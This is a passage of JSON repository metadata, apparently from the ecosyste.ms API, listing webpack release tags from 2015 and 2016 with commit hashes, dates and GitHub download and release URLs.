.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1